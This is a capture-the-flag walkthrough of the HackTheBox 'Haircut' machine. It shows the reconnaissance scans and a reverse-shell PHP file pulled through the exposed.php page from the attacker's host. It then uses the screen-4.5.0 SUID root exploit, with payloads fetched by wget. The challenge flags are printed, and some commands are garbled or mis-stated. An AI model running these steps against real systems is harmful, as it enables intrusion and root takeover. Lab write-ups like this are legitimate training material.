First start with an Nmap scan
# nmap -sV -sC -T4 -p- 10.10.10.24 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 16:37 UTC Nmap scan report for 10.10.10.24 Host is up (0.060s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA) | 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA) |_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519) 80/tcp open http nginx 1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: HTB Hairdresser Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.49 seconds
Only a couple ports to work with. Checking out port 80 I are greeted with a basic webpage with a photo.
Running a gobuster I find a couple of pages.
# gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 20 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.24 [+] Threads: 20 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php [+] Timeout: 10s =============================================================== 2019/09/26 16:46:56 Starting gobuster =============================================================== /uploads (Status: 301) /exposed.php (Status: 200)
The /uploads directory redirects us to a 403 so I cant do much there right now. The /exposed.php is the one that I want. In the top left I see a button that prints out a test.html file from the localhost.
I decided to try and see if I can interact with my attacking machine. To do this I set up a python SimpleHTTPServer on my attacking machine so I could attempt to transfer the a reverse shell over.
# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... # http://10.10.14.21/shell.php -o uploads/shell.php
Now I set up my nc listener and then triggered the shell by navigating to http://10.10.14.21/uploads/shell.php. If I check the listener then I will see that a shell has opened
# nc -lvnp 9999 listening on [any] 9999 ... connect to [10.10.14.21] from (UNKNOWN) [10.10.10.24] 43682 Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 19:45:58 up 1:08, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
From here I can grab the user flag
$ cat user.txt 0b0da2af50e9ab7c81a6ec2c562afeae
Now for the priv esc. If I run a LinEnum script you should see the vulnerable SUID binary screen-4.5.0.
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at -rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0 -rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 49584 May 4 2017 /usr/bin/chfn
A quick google search will reveal the exploit here. The problem is the exploit does not work stright away because gcc is broken on the box so I need to compile libhax.c and rootshell.c locally and then upload them to the box.
# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c /tmp/libhax.c: In function ‘dropshell’: # gcc -o /tmp/rootshell /tmp/rootshell.c /tmp/rootshell.c: In function ‘main’:
Now I need to copy libhax.so and rootshell over to the /tmp directory on the box. I can do this using a python SimpleHTTPServer again
$ wget 10.10.14.21:8000/rootshell ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. --2019-09-26 21:02:00-- http://10.10.14.21:8000/rootshell Connecting to 10.10.14.21:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 16824 (16K) [application/octet-stream] Saving to: 'rootshell' 0K .......... ...... 100% 562K=0.03s 2019-09-26 21:02:01 (562 KB/s) - 'rootshell' saved [16824/16824] [+] done! $ wget 10.10.14.21:8000/libhax.so ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. --2019-09-26 21:01:48-- http://10.10.14.21:8000/libhax.so Connecting to 10.10.14.21:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 16136 (16K) [application/octet-stream] Saving to: 'libhax.so' 0K .......... ..... 100% 521K=0.03s 2019-09-26 21:01:48 (521 KB/s) - 'libhax.so' saved [16136/16136]
Now run the exploit from earlier
$ bash screenroot.sh ~ gnu/screenroot ~ [+] First, I create our shell and library... gcc: error trying to exec 'cc1': execvp: No such file or directory gcc: error trying to exec 'cc1': execvp: No such file or directory [+] Now I create our /etc/ld.so.preload file... [+] Triggering... ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data. whoami root
Now I can grab the root flag
# cat root.txt 4cfa26d84b2220826a07f0697dc72151